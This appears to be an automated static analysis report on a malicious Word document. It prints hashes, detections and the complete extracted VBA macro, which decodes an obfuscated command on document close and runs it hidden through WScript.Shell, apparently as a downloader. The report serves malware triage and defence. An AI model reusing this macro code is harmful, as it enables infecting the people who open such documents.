Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9ab27bf6a30dd835…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 35.9 KB
Created: 2017-10-25 18:34:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-04-18
MD5: 557b1b7fc85e307b26f3cad2aabcfbbc
SHA-1: 4c9984a254c5c453a591fbc09edc916a43bec505
SHA-256: 9ab27bf6a30dd835d19c438bee3feeede1749c0ba9ef42fd601830f3950beab6
Risk score: 292

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoClose routine that uses WScript.Shell to execute a command. The command string is obfuscated (a long run of digit pairs is decoded through a character table inside the macro before being passed to WScript.Shell.Run with a hidden window), and the combination of AutoClose triggering with shell execution suggests the macro is designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Emooodldr-6711604-0' further supports its malicious nature.

Heuristics (8)

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML [medium] OOXML_VBA (4 related findings)
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script:
      If Len(verifica) > 16 Then
        Call CreateObject("WScript.Shell").Run(verifica, vbHide)
      End If
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
      If Len(verifica) > 16 Then
        Call CreateObject("WScript.Shell").Run(verifica, vbHide)
      End If
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro [low] OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script:
      Sub AutoClose()
        Call Application.Run("folclore", sfoltire("490925433500034311112318380907460112231807464344232837491400002318060917171442202315384325181319304344122333370012431734384312344043190611014342124534390925421109142002011143152603121249482121090942371400423712354343140404423514344409172108052104091909121934493744262923104342274831323239310831234723262436191200344346432645412333121435121832350944430000231043422748313232393108312624361912003443464326412315384325181319304344122333370012431734384312344043 …
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed below is a standard OOXML or Office XML namespace identifier of the kind found in ordinary Word documents, not a network indicator.
    • http://schemas.openxmlformats.org/markup-compatibility/2006  [In document text (OOXML body / shared strings)]
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships  [In document text (OOXML body / shared strings)]
    • http://schemas.openxmlformats.org/officeDocument/2006/math  [In document text (OOXML body / shared strings)]
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing  [In document text (OOXML body / shared strings)]
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main  [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2006/wordml  [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas  [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing  [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordml  [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup  [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk  [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape  [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2010/main  [In document text (OOXML body / shared strings)]

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1 of 2
  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 2477 bytes
  SHA-256: 593f47d7bcf0d0ecad3d5f6cb946ebf967f2c16de23d0be643d01d09cc474b98
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))
  Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function arrosto(malto As Integer) As String
 Dim enduro() As Variant
 enduro = Array("s", "i", "F", "h", "g", "Z", "C", "E", "T", "o", "$", "l", "t", "O", "a", "(", "=", "m", "-", "b", "d", "/", "?", " ", "\", "w", "'", "v", "B", ",", "j", "A", "P", "S", ".", "r", "X", "y", "N", "D", "W", ";", "n", "e", "c", ")", "x", "+", ":", "p")
 Dim reprimere As Integer
 
 For reprimere = LBound(enduro) To UBound(enduro)
   If reprimere = malto Then
    arrosto = enduro(reprimere)
   End If
 Next
 
End Function

Function sfoltire(Optional umano As String, Optional umano2)
  villano = rustico(Trim(umano))
  For reprimere = 0 To Len(umano)
  
    Dim amico As String
    Dim naturale As Integer
    If (reprimere + 1) <= UBound(villano) Then
    michele = svista(Array(michele, arrosto(Int(villano(reprimere) + villano(reprimere + 1)))))
    reprimere = reprimere + 1
    End If
  Next
  
  sfoltire = michele
End Function


Public Function folclore(verifica As String)
  If Len(verifica) > 16 Then
    Call CreateObject("WScript.Shell").Run(verifica, vbHide)
  End If
End Function

Sub AutoClose()
 Call Application.Run("folclore", sfoltire("49092543350003431111231838090746011223180746434423283749140000231806091717144220231538432518131930434412233337001243173438431234404319061101434212453439092542110914200201114315260312124948212109094237140042371235434314040442351434440917210805210409190912193449374426292310434227483132323931083123472326243619120034434643264541233312143512183235094443000023104342274831323239310831262436191200344346432641231538432518131930434412233337001243173438431234404319061101434212453439092542110914203312350142041526031212494821210909423714004237123543431404044235143444091721003449034922012016040919091219264541"))
End Sub

Function svista(satellite As Variant)
 pargolo = ""
 
 For organico = 0 To UBound(satellite)
   pargolo = pargolo & "" & satellite(organico)
 Next
 
 svista = pargolo
End Function



Function rustico(ascolto As String, Optional flacone As Integer) As Variant
    rustico = Split(Left(StrConv(ascolto, vbUnicode), Len(StrConv(ascolto, vbUnicode)) - 1), vbNullChar)
End Function
Artifact 2 of 2
  Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: word/vbaProject.bin
  Size: 12288 bytes
  SHA-256: 469f81e757898f7f7db99e966850cb636565814e732852f7273534b39b7fe034
  Detection: ClamAV: Doc.Malware.Emooodldr-6711604-0
  Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))